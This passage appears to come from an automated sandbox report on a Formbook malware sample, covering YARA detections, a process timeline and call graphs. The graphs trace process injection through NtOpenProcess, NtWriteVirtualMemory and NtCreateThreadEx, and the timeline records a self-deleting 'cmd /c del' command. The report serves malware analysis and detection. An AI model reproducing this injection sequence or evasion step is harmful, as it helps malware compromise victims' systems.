                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:13:16:54
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                Imagebase:0x7ff72b770000
                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:13:16:58
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\netsh.exe"
                                                                                                                                                Imagebase:0x1560000
                                                                                                                                                File size:82'432 bytes
                                                                                                                                                MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:13:17:02
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c del "C:\Windows\SysWOW64\SndVol.exe"
                                                                                                                                                Imagebase:0x7ff70f330000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:13:17:02
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true


Execution Graph

Execution Coverage:11.4%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:10.9%
Total number of Nodes:560
Total number of Limit Nodes:13
35196->35197 35198 29c3f94 35197->35198 35199 29c3f9f 35198->35199 35200 29c3fac 35199->35200 35201 29a47ec 11 API calls 35200->35201 35202 29c3fcb 35201->35202 35203 29c3fe3 35202->35203 35204 29b89d0 20 API calls 35203->35204 35205 29c3fef 35204->35205 35206 29a4860 11 API calls 35205->35206 35207 29c4010 35206->35207 35208 29c401b 35207->35208 35209 29c4028 35208->35209 35210 29a47ec 11 API calls 35209->35210 35211 29c4047 35210->35211 35212 29c4052 35211->35212 35213 29c405f 35212->35213 35214 29b89d0 20 API calls 35213->35214 35215 29c406b 35214->35215 36744 29be358 35215->36744 35218 29c4091 35219 29c40a2 35218->35219 36749 29bdc8c 35219->36749 35222 29a4860 11 API calls 35223 29c40f1 35222->35223 35224 29c40fc 35223->35224 35225 29a47ec 11 API calls 35224->35225 35226 29c4128 35225->35226 35227 29c4133 35226->35227 35228 29b89d0 20 API calls 35227->35228 35229 29c414c 35228->35229 35230 29a4860 11 API calls 35229->35230 35231 29c416d 35230->35231 35232 29a47ec 11 API calls 35231->35232 35233 29c41a4 35232->35233 35234 29c41af 35233->35234 35235 29b89d0 20 API calls 35234->35235 35236 29c41c8 35235->35236 35237 29b88b8 20 API calls 35236->35237 35238 29c41cd 35237->35238 35239 29c41d7 35238->35239 36764 29be678 35239->36764 35242 29a4860 11 API calls 35243 29c4217 35242->35243 35244 29c422f 35243->35244 35245 29a47ec 11 API calls 35244->35245 35246 29c424e 35245->35246 35247 29c4259 35246->35247 35248 29b89d0 20 API calls 35247->35248 35249 29c4272 Sleep 35248->35249 35250 29a4860 11 API calls 35249->35250 35251 29c429d 35250->35251 35252 29c42b5 35251->35252 35253 29a47ec 11 API calls 35252->35253 35254 29c42d4 35253->35254 35255 29c42df 35254->35255 35256 29c42ec 35255->35256 35257 29b89d0 20 API calls 35256->35257 35258 29c42f8 35257->35258 35259 29a4860 11 API calls 35258->35259 35260 29c4319 35259->35260 35261 29c4324 35260->35261 36903 29a46d4 35261->36903 36725 29b89e4 36724->36725 36726 29b81cc 17 API calls 36725->36726 36727 29b8a1d 36726->36727 
36728 29b8274 15 API calls 36727->36728 36729 29b8a36 36728->36729 36730 29b7d78 18 API calls 36729->36730 36731 29b8a95 36730->36731 36905 29b8338 36731->36905 36734 29b8abc 36735 29a4500 11 API calls 36734->36735 36736 29b8ac9 36735->36736 36737 29bf094 36736->36737 36739 29bf0b9 36737->36739 36738 29bf0e5 36740 29a44dc 11 API calls 36738->36740 36739->36738 36917 29a46c4 11 API calls 36739->36917 36918 29a4530 11 API calls 36739->36918 36742 29bf0fa 36740->36742 36742->35184 36745 29a4bcc 11 API calls 36744->36745 36746 29be370 36745->36746 36747 29be391 36746->36747 36919 29a49f8 36746->36919 36747->35218 36750 29bdca2 36749->36750 36926 29a4f20 36750->36926 36752 29bdcaa 36753 29bdcca RtlDosPathNameToNtPathName_U 36752->36753 36930 29bdbdc 36753->36930 36755 29bdce6 NtCreateFile 36756 29bdd11 36755->36756 36757 29a49f8 11 API calls 36756->36757 36758 29bdd23 NtWriteFile NtClose 36757->36758 36759 29bdd4d 36758->36759 36931 29a4c60 36759->36931 36762 29a44dc 11 API calls 36763 29bdd5d Sleep 36762->36763 36763->35222 36765 29be681 36764->36765 36765->36765 36766 29a4860 11 API calls 36765->36766 36767 29be6ca 36766->36767 36768 29a47ec 11 API calls 36767->36768 36769 29be6ef 36768->36769 36770 29b89d0 20 API calls 36769->36770 36771 29be70a 36770->36771 36772 29a4860 11 API calls 36771->36772 36773 29be723 36772->36773 36774 29a47ec 11 API calls 36773->36774 36775 29be748 36774->36775 36776 29b89d0 20 API calls 36775->36776 36777 29be763 36776->36777 36778 29a4860 11 API calls 36777->36778 36779 29be77c 36778->36779 36780 29a47ec 11 API calls 36779->36780 36781 29be7a1 36780->36781 36782 29b89d0 20 API calls 36781->36782 36783 29be7bc 36782->36783 36784 29a4860 11 API calls 36783->36784 36785 29be7ee 36784->36785 36786 29b89d0 20 API calls 36785->36786 36787 29be838 36786->36787 36788 29a4860 11 API calls 36787->36788 36789 29be86f 36788->36789 36790 29a47ec 11 API calls 36789->36790 36791 29be894 36790->36791 36792 29b89d0 20 API calls 36791->36792 36793 
29be8af 36792->36793 36794 29a4860 11 API calls 36793->36794 36795 29be8c8 36794->36795 36796 29a47ec 11 API calls 36795->36796 36797 29be8ed 36796->36797 36798 29b89d0 20 API calls 36797->36798 36799 29be908 36798->36799 36800 29a4860 11 API calls 36799->36800 36801 29be921 36800->36801 36802 29a47ec 11 API calls 36801->36802 36803 29be946 36802->36803 36804 29b89d0 20 API calls 36803->36804 36805 29be961 36804->36805 36934 29a7f2c 36805->36934 36807 29be985 36938 29b8788 36807->36938 36810 29a4860 11 API calls 36811 29bea0a 36810->36811 36812 29a47ec 11 API calls 36811->36812 36813 29bea3b 36812->36813 36814 29b89d0 20 API calls 36813->36814 36815 29bea5f 36814->36815 36816 29a4860 11 API calls 36815->36816 36817 29bea7b 36816->36817 36818 29a47ec 11 API calls 36817->36818 36819 29beaac 36818->36819 36820 29b89d0 20 API calls 36819->36820 36821 29bead0 36820->36821 36822 29a4860 11 API calls 36821->36822 36823 29beaec 36822->36823 36824 29a47ec 11 API calls 36823->36824 36825 29beb1d 36824->36825 36826 29b89d0 20 API calls 36825->36826 36827 29beb41 36826->36827 36828 29a4860 11 API calls 36827->36828 36829 29beb5d 36828->36829 36830 29a47ec 11 API calls 36829->36830 36831 29beb7b 36830->36831 36950 29b894c LoadLibraryW 36831->36950 36834 29a4860 11 API calls 36835 29bebac 36834->36835 36836 29a47ec 11 API calls 36835->36836 36837 29bebca 36836->36837 36838 29b894c 21 API calls 36837->36838 36839 29bebdf 36838->36839 36840 29a4860 11 API calls 36839->36840 36841 29bebfb 36840->36841 36842 29a47ec 11 API calls 36841->36842 36843 29bec19 36842->36843 36844 29b894c 21 API calls 36843->36844 36845 29bec2e 36844->36845 36846 29a4860 11 API calls 36845->36846 36847 29bec4a 36846->36847 36848 29a47ec 11 API calls 36847->36848 36849 29bec68 36848->36849 36850 29b894c 21 API calls 36849->36850 36851 29bec7d 36850->36851 36852 29beee2 36851->36852 36853 29bec87 36851->36853 36855 29a4500 11 API calls 36852->36855 36854 29a4860 11 API calls 36853->36854 36859 29beca3 
36854->36859 36856 29beeff 36855->36856 36857 29a4c60 SysFreeString 36856->36857 36858 29bef0a 36857->36858 36860 29a4500 11 API calls 36858->36860 36862 29a47ec 11 API calls 36859->36862 36861 29bef1a 36860->36861 36863 29a4c60 SysFreeString 36861->36863 36867 29becd4 36862->36867 36864 29bef22 36863->36864 36865 29a4500 11 API calls 36864->36865 36866 29bef2f 36865->36866 36866->35242 36868 29b89d0 20 API calls 36867->36868 36869 29becf8 36868->36869 36870 29a4860 11 API calls 36869->36870 36871 29bed14 36870->36871 36872 29a47ec 11 API calls 36871->36872 36873 29bed45 36872->36873 36874 29b89d0 20 API calls 36873->36874 36875 29bed69 WaitForSingleObject CloseHandle CloseHandle 36874->36875 36876 29a4860 11 API calls 36875->36876 36877 29beda0 36876->36877 36878 29a47ec 11 API calls 36877->36878 36879 29bedbe 36878->36879 36880 29b894c 21 API calls 36879->36880 36881 29bedd3 36880->36881 36882 29a4860 11 API calls 36881->36882 36883 29bedef 36882->36883 36884 29a47ec 11 API calls 36883->36884 36885 29bee0d 36884->36885 36886 29b894c 21 API calls 36885->36886 36887 29bee22 36886->36887 36888 29a4860 11 API calls 36887->36888 36889 29bee3e 36888->36889 36890 29a47ec 11 API calls 36889->36890 36891 29bee5c 36890->36891 36892 29b894c 21 API calls 36891->36892 36893 29bee71 36892->36893 36894 29a4860 11 API calls 36893->36894 36895 29bee8d 36894->36895 36896 29a47ec 11 API calls 36895->36896 36897 29beeab 36896->36897 36898 29b894c 21 API calls 36897->36898 36899 29beec0 36898->36899 36900 29b894c 21 API calls 36899->36900 36901 29beed1 36900->36901 36902 29b894c 21 API calls 36901->36902 36902->36852 36904 29a46da 36903->36904 36906 29a4530 11 API calls 36905->36906 36907 29b835b 36906->36907 36908 29a4860 11 API calls 36907->36908 36909 29b837a 36908->36909 36910 29b81cc 17 API calls 36909->36910 36911 29b838d 36910->36911 36912 29b8274 15 API calls 36911->36912 36913 29b8393 FlushInstructionCache 36912->36913 36914 29b83b9 36913->36914 36915 29a44dc 11 API calls 
36914->36915 36916 29b83c1 FreeLibrary 36915->36916 36916->36734 36917->36739 36918->36739 36920 29a49ac 36919->36920 36921 29a45a0 11 API calls 36920->36921 36923 29a49e7 36920->36923 36922 29a49c3 36921->36922 36922->36923 36925 29a2c2c 11 API calls 36922->36925 36923->36746 36925->36923 36927 29a4f3c 36926->36927 36928 29a4f26 SysAllocStringLen 36926->36928 36927->36752 36928->36927 36929 29a4c30 36928->36929 36929->36926 36930->36755 36932 29a4c66 SysFreeString 36931->36932 36933 29a4c74 36931->36933 36932->36933 36933->36762 36935 29a7f3f 36934->36935 36957 29a4a00 36935->36957 36939 29a4530 11 API calls 36938->36939 36940 29b87ab 36939->36940 36941 29a4860 11 API calls 36940->36941 36942 29b87ca 36941->36942 36943 29b81cc 17 API calls 36942->36943 36944 29b87dd 36943->36944 36945 29b8274 15 API calls 36944->36945 36946 29b87e3 CreateProcessAsUserW 36945->36946 36947 29b8827 36946->36947 36948 29a44dc 11 API calls 36947->36948 36949 29b882f 36948->36949 36949->36810 36951 29b89bb 36950->36951 36952 29b8973 GetProcAddress 36950->36952 36951->36834 36953 29b898d 36952->36953 36954 29b89b0 FreeLibrary 36952->36954 36955 29b7d78 18 API calls 36953->36955 36954->36951 36956 29b89a5 36955->36956 36956->36954 36958 29a4a32 36957->36958 36959 29a4a05 36957->36959 36960 29a44dc 11 API calls 36958->36960 36959->36958 36962 29a4a19 36959->36962 36961 29a4a28 36960->36961 36961->36807 36964 29a45cc 36962->36964 36965 29a45a0 11 API calls 36964->36965 36966 29a45dc 36965->36966 36967 29a44dc 11 API calls 36966->36967 36968 29a45f4 36967->36968 36968->36961

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 6026 29bb118-29bb11b 6027 29bb120-29bb125 6026->6027 6027->6027 6028 29bb127-29bb7b0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b8594 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 GetModuleHandleW call 29b8274 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 NtOpenProcess call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a2ee0 call 29a2f08 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6027->6028 6247 29bcd28-29bcf5e call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b894c * 3 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 
29a46d4 call 29b89d0 call 29b894c * 4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6028->6247 6248 29bb7b6-29bb930 call 29b7c10 call 29b7a2c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6028->6248 6385 29bcf63-29bcfa0 call 29a4500 * 3 6247->6385 6248->6247 6344 29bb936-29bb966 call 29b58f4 IsBadReadPtr 6248->6344 6344->6247 6357 29bb96c-29bb971 6344->6357 6357->6247 6359 29bb977-29bb993 IsBadReadPtr 6357->6359 6359->6247 6361 29bb999-29bb9a2 6359->6361 6361->6247 6363 29bb9a8-29bb9cd 6361->6363 6363->6247 6364 29bb9d3-29bbb4c call 29b7c10 call 29b7a2c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6363->6364 6364->6247 6429 29bbb52-29bbcc8 call 29b7a2c call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6364->6429 6429->6247 6474 29bbcce-29bbf3e call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29bafd4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6429->6474 6547 29bc0dc-29bc23a call 29a4860 call 
29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6474->6547 6548 29bbf44-29bbf45 6474->6548 6634 29bc23c-29bc261 call 29baf24 6547->6634 6635 29bc266-29bca86 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29bafe0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b7d78 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 GetModuleHandleW call 29b8274 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 NtCreateThreadEx call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6547->6635 6550 
29bbf49-29bc0d6 call 29bafd4 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 6548->6550 6550->6547 6634->6635 6882 29bca8b-29bcd23 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29a4860 call 29a49a0 call 29a46d4 call 29a47ec call 29a49a0 call 29a46d4 call 29b89d0 call 29b894c * 5 call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29a4860 call 29a49a0 call 29a47ec call 29a49a0 call 29b894c call 29b8080 call 29b894c * 2 6635->6882 6882->6247
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll,NtOpenProcess,UacScan,02A27380,029BCFC0,ScanString,02A27380,029BCFC0,ScanBuffer,02A27380,029BCFC0,ScanString,02A27380,029BCFC0,UacScan,02A27380), ref: 029BB3EA
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • NtOpenProcess.NTDLL(02A27584,001F0FFF,02A27318,02A27330), ref: 029BB4E8
                                                                                                                                                    • Part of subcall function 029A2EE0: QueryPerformanceCounter.KERNEL32 ref: 029A2EE4
                                                                                                                                                    • Part of subcall function 029B7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029B7A9F
                                                                                                                                                  • IsBadReadPtr.KERNEL32(211C0000,00000040), ref: 029BB95F
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,000000F8), ref: 029BB98C
                                                                                                                                                    • Part of subcall function 029B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02A27380,029BCFC0,ScanString,02A27380,029BCFC0,047C0000,047C0000,21A60000,30794D5A,ZMy0Z]v0,OpenSession,02A27380,029BCFC0), ref: 029BC807
                                                                                                                                                  • NtCreateThreadEx.NTDLL(02A27560,02000000,02A27318,047DF110,047DF110,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02A27380,029BCFC0,UacInitialize,02A27380), ref: 029BCA18
                                                                                                                                                    • Part of subcall function 029B894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
                                                                                                                                                    • Part of subcall function 029B894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
                                                                                                                                                    • Part of subcall function 029B894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
